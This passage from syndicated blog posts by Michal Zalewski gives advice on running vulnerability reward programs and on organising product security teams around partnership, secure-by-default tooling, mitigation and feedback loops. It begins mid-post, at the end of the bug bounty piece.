talk about some of the ways to get vulnerability rewards right.

What do you get out of bug bounties?

There are plenty of differing views, but I like to think of such programs
simply as a bid on researchers’ time. In the most basic sense, you get three benefits:

  • Improved ability to detect bugs in production before they become major incidents.
  • A comparatively unbiased feedback loop to help you prioritize and measure other security work.
  • A robust talent pipeline for when you need to hire.

What don’t bug bounties offer?

You don’t get anything resembling a comprehensive security program or a systematic assessment of your platforms.
Researchers end up looking for bugs that offer favorable effort-to-payoff ratios for their skills, given the
very imperfect information they have about your enterprise. In other words, you may end up with a hundred
people looking for XSS and just one person looking for RCE.

Your reward structure can steer them toward the targets and bugs you care about, but it’s difficult to fully
eliminate this inherent skew. There’s only so far you can jack up your top-tier rewards, and only so far you can
go lowering the bottom-tier ones.

Don’t you have to outcompete the black market to get all the “good” bugs?

There is a free market price discovery component to it all: if you’re not getting the engagement you
were hoping for, you should probably consider paying more.

That said, there are going to be researchers who’d rather hurt you than work for you, no matter how much you pay;
you don’t have to win them over, and you don’t have to outspend every authoritarian government or
every crime syndicate. A bug bounty is effective simply if it attracts enough eyeballs to make bugs statistically
harder to find, and reduces the useful lifespan of any zero-days in black market trade. Plus, most
researchers don’t want their work to be used to crack down on dissidents in Egypt or Vietnam.

Another factor is that you’re paying for different things: a black market buyer probably wants a reliable exploit
capable of delivering payloads, and then demands silence for months or years to come; a vendor-run
bug bounty program is usually perfectly happy with a reproducible crash and doesn’t mind a researcher blogging
about their work.

In fact, while money is important, you will probably find out that it’s not enough to retain your top talent;
many folks want bug bounties to be more than a business transaction, and find a lot of value in having a close
relationship with your security team, comparing notes, and growing together. Fostering that partnership can
be more important than adding another $10,000 to your top reward.

How do I prevent it all from going horribly wrong?

Bug bounties are an unfamiliar beast to most lawyers and PR folks, so it’s natural to be wary and try to plan
for every eventuality with pages and pages of impenetrable rules and fine-print legalese.

This is generally unnecessary: there is a strong self-selection bias, and almost every participant in a
vulnerability reward program will be coming to you in good faith. The more friendly, forthcoming, and
approachable you seem, and the more you treat them like peers, the more likely it is for your relationship to stay
positive. On the flip side, there is no faster way to make enemies than to make a security researcher feel that they
are now talking to a lawyer or to the PR dept.

Most people have strong opinions on disclosure policies; instead of imposing your own views, strive to patch reported bugs
reasonably quickly, and almost every reporter will play along. Demand that researchers cancel conference appearances,
take down blog posts, or sign NDAs, and you will sooner or later end up in the news.

But what if that’s not enough?

As with any business endeavor, mistakes will happen; total risk avoidance is seldom the answer. Learn to sincerely
apologize for mishaps; it’s not a sign of weakness to say “sorry, we messed up”. And you will almost certainly not end
up in the courtroom for doing so.

It’s good to foster a healthy and productive relationship with the community, so that they come to your defense when
something goes wrong. Encouraging people to disclose bugs and talk about their experiences is one way of accomplishing that.

What about extortion?

You should structure your program to naturally discourage bad behavior and make it stand out like a sore thumb.
Require bona fide reports with complete technical details before any reward decision is made by a panel of named peers;
and make it clear that you never demand non-disclosure as a condition of getting a reward.

To avoid researchers accidentally putting themselves in awkward situations, have clear rules around data exfiltration
and lateral movement: assure them that you will always pay based on the worst-case impact of their findings; in exchange,
ask them to stop as soon as they get a shell and never access any data that isn’t their own.

So… are there any downsides?

Yep. Other than souring your relationship with the community if you implement your program wrong, the other consideration
is that bug bounties tend to generate a lot of noise from well-meaning but less-skilled researchers.

When this happens, do not get frustrated and do not penalize such participants; instead, help them grow. Consider
publishing educational articles, giving advice on how to investigate and structure reports, or
offering free workshops every now and then.

The other downside is cost; although bug bounties tend to offer far more bang for your buck than your average penetration
test, they are more random. The annual expenses tend to be fairly predictable, but there is always
some possibility of having to pay multiple top-tier rewards in rapid succession. This is the kind of uncertainty that
many mid-level budget planners react badly to.

Finally, you need to be able to fix the bugs you receive. It would be nuts to prefer to not know about the
vulnerabilities in the first place – but once you invite the research, the clock starts ticking and you need to
ship fixes reasonably fast.

So… should I try it?

There are folks who enthusiastically advocate for bug bounties in every conceivable situation, and people who dislike them
with fierce passion; both sentiments are usually strongly correlated with the line of business they are in.

In reality, bug bounties are not a cure-all, and there are some ways to make them ineffectual or even dangerous.
But they are not as risky or expensive as most people suspect, and when done right, they can actually be fun for your
team, too. You won’t know for sure until you try.

Getting product security engineering right

Post Syndicated from Michal Zalewski original http://lcamtuf.blogspot.com/2018/02/getting-product-security-engineering.html

Product security is an interesting animal: it is a uniquely cross-disciplinary endeavor that spans policy, consulting,
process automation, in-depth software engineering, and cutting-edge vulnerability research. And in contrast to many
other specializations in our field of expertise – say, incident response or network security – we have virtually no
time-tested and coherent frameworks for setting it up within a company of any size.

In my previous post, I shared some thoughts
on nurturing technical organizations and cultivating the right kind of leadership within. Today, I figured it would
be fitting to follow up with several notes on what I learned about structuring product security work – and about actually
making the effort count.

The “comfort zone” trap

For security engineers, knowing your limits is a sought-after quality: there is nothing more dangerous than a security
expert who goes off script and starts dispensing authoritative-sounding but bogus advice on a topic they know very
little about. But that same quality can be destructive when it prevents us from growing beyond our most familiar role: that of
a critic who pokes holes in other people’s designs.

The role of a resident security critic lends itself all too easily to a sense of supremacy: the mistaken
belief that our cognitive skills exceed the capabilities of the engineers and product managers who come to us for help
– and that the cool bugs we file are the ultimate proof of our special gift. We start taking pride in the mere act
of breaking somebody else’s software – and then write scathing but ineffectual critiques addressed to executives,
demanding that they either put a stop to a project or sign off on a risk. And hey, in the latter case, they better
brace for our triumphant “I told you so” at some later date.

Of course, escalations of this type have their place, but they need to be a very rare sight; when practiced routinely, they are a telltale
sign of a dysfunctional team. We might be failing to think up viable alternatives that are in tune with business or engineering needs; we might
be very unpersuasive, failing to communicate with other rational people in a language they understand; or it might be that our tolerance for risk
is badly out of whack with the rest of the company. Whatever the cause, I’ve seen high-level escalations where the security team
spoke of valiant efforts to resist inexplicably awful design decisions or data sharing setups; and where product leads in turn talked about
pressing business needs randomly blocked by obstinate security folks. Sometimes, simply having them compare their notes would be enough to arrive
at a technical solution – such as sharing a less sensitive subset of the data at hand.

To be effective, any product security program must be rooted in a partnership with the rest of the company, focused on helping them get stuff done
while eliminating or reducing security risks. To combat the toxic us-versus-them mentality, I found it helpful to have some team members with
software engineering backgrounds, even if it’s the ownership of a small open-source project or so. This can broaden our horizons, helping us see
that we all make the same mistakes – and that not every solution that sounds good on paper is usable once we code it up.

Getting off the treadmill

All security programs involve a good chunk of operational work. For product security, this can be a combination of product launch reviews, design consulting requests, incoming bug reports, or compliance-driven assessments of some sort. And curiously, such reactive work also has the property of gradually expanding to consume all the available resources on a team: next year is bound to bring even more review requests, even more regulatory hurdles, and even more incoming bugs to triage and fix.

Being more tractable, such routine tasks are also more readily enshrined in SDLs, SLAs, and all kinds of other official documents that are often mistaken for a mission statement that justifies the existence of our teams. Soon, instead of explaining to a developer why they should fix a particular problem right away, we end up pointing them to page 17 in our severity classification guideline, which defines that “severity 2” vulnerabilities need to be resolved within a month. Meanwhile, another policy may be telling them that they need to run a fuzzer or a web application scanner for a particular number of CPU-hours – no matter whether it makes sense or whether the job is set up right.

To run a product security program that scales sublinearly, stays abreast of future threats, and doesn’t erect bureaucratic speed bumps just for the sake of it, we need to recognize this inherent tendency for operational work to take over – and we need to rein it in. No matter what the last year’s policy says, we usually don’t need to be doing security reviews with a particular cadence or to a particular depth; if we need to scale them back 10% to staff a two-quarter project that fixes an important API and squashes an entire class of bugs, it’s a short-term risk we should feel empowered to take.

As noted in my earlier post, I find contingency planning to be a valuable tool in this regard: why not ask ourselves how the team would cope if the workload went up another 30%, but bad financial results precluded any team growth? It’s actually fun to think about such hypotheticals ahead of time – and hey, if the ideas sound good, why not try them out today?

Living for a cause

It can be difficult to understand if our security efforts are structured and prioritized right; when faced with such uncertainty, it is natural to stick to the safe fundamentals – investing most of our resources into the very same things that everybody else in our industry appears to be focusing on today.

I think it’s important to combat this mindset – and if so, we might as well tackle it head on. Rather than focusing on tactical objectives and policy documents, try to write down a concise mission statement explaining why you are a team in the first place, what specific business outcomes you are aiming for, how you prioritize them, and how you want it all to change in a year or two. It should be a fluid narrative that reads right and that everybody on your team can take pride in; my favorite way of starting the conversation is telling folks that we could always have a new VP tomorrow – and that the VP’s first order of business could be asking, “why do you have so many people here and how do I know they are doing the right thing?”. It’s a playful but realistic framing device that motivates people to get it done.

In general, a comprehensive product security program should probably start with the assumption that no matter how many resources we have at our disposal, we will never be able to stay in the loop on everything that’s happening across the company – and even if we did, we’re not going to be able to catch every single bug. It follows that one of our top priorities for the team should be making sure that bugs don’t happen very often; a scalable way of getting there is equipping engineers with intuitive and usable tools that make it easy to perform common tasks without having to worry about security at all. Examples include standardized, managed containers for production jobs; safe-by-default APIs, such as strict contextual autoescaping for XSS or type safety for SQL; security-conscious style guidelines; or plug-and-play libraries that take care of common crypto or ACL enforcement tasks.

Of course, not all problems can be addressed on framework level, and not every engineer will always reach for the right tools. Because of this, the next principle that I found to be worth focusing on is containment and mitigation: making sure that bugs are difficult to exploit when they happen, or that the damage is kept in check. The solutions in this space can range from low-level enhancements (say, hardened allocators or seccomp-bpf sandboxes) to client-facing features such as browser origin isolation or Content Security Policy.

The usual consulting, review, and outreach tasks are an important facet of a product security program, but probably shouldn’t be the sole focus of your team. It’s also best to avoid undue emphasis on vulnerability showmanship: while valuable in some contexts, it creates a hypercompetitive environment that may be hostile to less experienced team members – not to mention, squashing individual bugs offers very limited value if the same issue is likely to be reintroduced into the codebase the next day. I like to think of security reviews as a teaching opportunity instead: it’s a way to raise awareness, form partnerships with engineers, and help them develop lasting habits that reduce the incidence of bugs. Metrics to understand the impact of your work are important, too; if your engagements are seen mostly as yet another layer of red tape, product teams will stop reaching out to you for advice.

The other tenet of a healthy product security effort requires us to recognize that, at scale and given enough time, every defense mechanism is bound to fail – and so we need ways to prevent bugs from turning into incidents. The efforts in this space may range from developing product-specific signals for the incident response and monitoring teams; to offering meaningful vulnerability reward programs and nourishing a healthy and respectful relationship with the research community; to organizing regular offensive exercises in hopes of spotting bugs before anybody else does.

Oh, one final note: an important feature of a healthy security program is the existence of multiple feedback loops that help you spot problems without the need to micromanage the organization and without being deathly afraid of taking chances. For example, the data coming from bug bounty programs, if analyzed correctly, offers a wonderful way to alert you to systemic problems in your codebase – and later on, to measure the impact of any remediation and hardening work.